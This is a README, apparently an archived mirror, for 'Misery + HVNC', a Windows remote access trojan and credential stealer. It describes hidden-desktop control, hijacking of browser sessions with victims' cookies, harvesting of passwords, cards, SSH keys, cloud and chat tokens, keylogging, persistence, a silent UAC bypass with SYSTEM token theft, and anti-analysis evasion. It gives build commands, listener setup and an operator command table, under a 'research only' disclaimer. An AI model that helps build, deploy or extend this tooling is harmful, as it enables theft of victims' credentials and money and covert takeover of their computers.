Misery + HVNC

Misery
a devoted sister of the Church of Malware

HVNC RAT and stealer research project, derived from Misery. For local testing and research only.

Features

  • Hidden desktop (hvnc start): GDI apps on a hidden desktop, streamed live
  • Interactive browser (hvnc launch chrome): real Chromium with the victim's logins, driven over CDP
  • Ghosted browser (ghost <url>): hidden Chrome/Edge session using the victim's cookies and logins
  • Credential harvesting: Chrome, Edge, Brave, Opera, Opera GX, Firefox
  • App-session harvesting: payment cards, Discord, Steam, Telegram, Slack, VS Code, AWS, SSH keys, Wi-Fi passwords, wallet extension paths, Signal session listing
  • Encrypted C2 channel: reverse TCP (default) or HTTPS beaconing through a CDN
  • Keylogger and clipboard monitoring
  • Persistence: HKCU Run key and WMI event subscriptions
  • Elevation (elevate): silent UAC bypass to High via PEB masquerade and CMSTPLUA/ICMLuaUtil, then SYSTEM through SeDebug token theft from a non-PPL system process. Verified on Windows 11 25H2 (build 26200)
  • Anti-analysis: user-mode environment checks, reflective injection

Misery operator view

VirusTotal

VirusTotal scan result

Quick start

setup.py writes src/config.h, saves the console's ECDH key to .misery_key, and builds the project:

python setup.py -g                                        # interactive
python setup.py -t tcp LHOST=127.0.0.1 LPORT=4444 -o agent   # non-interactive

Run the console listener, then the agent:

.\build\console.exe
.\build\agent.exe

Type help in the console for the full command list.

Commands

Command What it does
steal run credential and session harvesting
elevate silently relaunch the agent as admin; the new instance registers as elevated
hvnc start / hvnc stop start or stop the hidden desktop session
hvnc launch [path] launch an app (default Chrome) on the hidden desktop
hvnc quality [10-100] set streamed frame JPEG quality
ghost <url> open a URL in a ghosted hidden browser
ghost nav <url> navigate the ghost browser
ghost stop stop the ghost session
keylog toggle the keylogger
clip read the victim's clipboard
clear / exit clear the terminal / quit

Build

Requires cmake and a C++ toolchain (MSVC, MinGW, or Clang).

MSVC:

cmake -S . -B build -G "Visual Studio 17 2022" -A x64
cmake --build build --config Release

MinGW:

cmake -S . -B build -G "MinGW Makefiles" -DCMAKE_BUILD_TYPE=Release
cmake --build build -j 4

A fresh checkout builds against 127.0.0.1:4444. Run setup.py once so .misery_key exists.

Layout

  • src/agent: entry, C2 client, injector, persistence
  • src/console: operator console + listener
  • src/payload: payload DLL, reflective loader, trampoline
  • src/stealer: Misery-derived sources
  • src/hvnc: hidden-desktop session
  • src/ghost: ghosted browser session
  • src/browser: CDP client (Page/Input over WebSocket)
  • src/rat: keylogger + clipboard
  • src/transport: encrypted TCP framing, HTTPS beacon carrier, compression
  • src/evasion: indirect syscalls, anti-analysis, UAC/token elevation, helpers
  • build/: out-of-source build dir

Licence

No licence granted. Research code for study only; not licensed for redistribution or commercial use.

S
Description
Automated archival mirror of churchofmalware.org/JYenn/Misery
Readme
19 MiB
Languages
C++ 87.5%
Python 10.5%
CMake 0.9%
Assembly 0.8%
C 0.3%